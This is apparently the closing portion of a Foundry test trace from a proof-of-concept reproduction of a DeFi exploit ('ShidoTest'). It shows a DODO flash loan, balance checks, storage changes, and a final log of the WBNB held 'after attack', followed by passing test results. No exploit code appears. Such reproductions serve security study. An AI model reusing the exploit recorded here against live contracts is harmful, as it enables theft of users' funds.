    │   │   │   │   @ 0x44bf1039324fcbfda472196706fa68525cb38db0f3d91f5ca7d489ff92357e45: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   @ 0xbfbd819bee7413a014b56cf4a503f98b570a1273403ef6f1c629ebd3e612b335: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffffff6f285fe3dea5e98c
    │   │   │   └─ ← [Stop]
    │   │   ├─ [534] WBNB::balanceOf(DPPAdvanced: [0x81917eb96b397dFb1C6000d28A5bc08c0f05fC1d]) [staticcall]
    │   │   │   └─ ← [Return] 951818229414455731762 [9.518e20]
    │   │   ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(DPPAdvanced: [0x81917eb96b397dFb1C6000d28A5bc08c0f05fC1d]) [staticcall]
    │   │   │   └─ ← [Return] 223537322073875815650524 [2.235e23]
    │   │   ├─ [534] WBNB::balanceOf(DPPAdvanced: [0x81917eb96b397dFb1C6000d28A5bc08c0f05fC1d]) [staticcall]
    │   │   │   └─ ← [Return] 951818229414455731762 [9.518e20]
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(DPPAdvanced: [0x81917eb96b397dFb1C6000d28A5bc08c0f05fC1d]) [staticcall]
    │   │   │   └─ ← [Return] 223537322073875815650524 [2.235e23]
    │   │   ├─ emit DODOFlashLoan(: ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 40000000000000000000 [4e19], : 0)
    │   │   ├─  storage changes:
    │   │   │   @ 0x3c60da1376f85a7f3c888682818856b0c611572c8d06dc51114a9951a6f90e17: 0x0000000000000000000000000000000000000000000000316e0518a1e644e632 → 0x0000000000000000000000000000000000000000000000339921a4b40de4e632
    │   │   └─ ← [Stop]
    │   └─ ← [Return]
    ├─ [534] WBNB::balanceOf(ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 976975297305562276696 [9.769e20]
    ├─ [444] WBNB::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "[End] WBNB amount after attack", val: 976975297305562276696 [9.769e20], decimals: 18)
    ├─  storage changes:
    │   @ 1: 0x0000000000000000000001010000000000000000000000000000000000000000 → 0x0000000000000000000000010000000000000000000000000000000000000000
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 68.70s (66.72s CPU time)

Ran 2 test suites in 70.25s (69.58s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
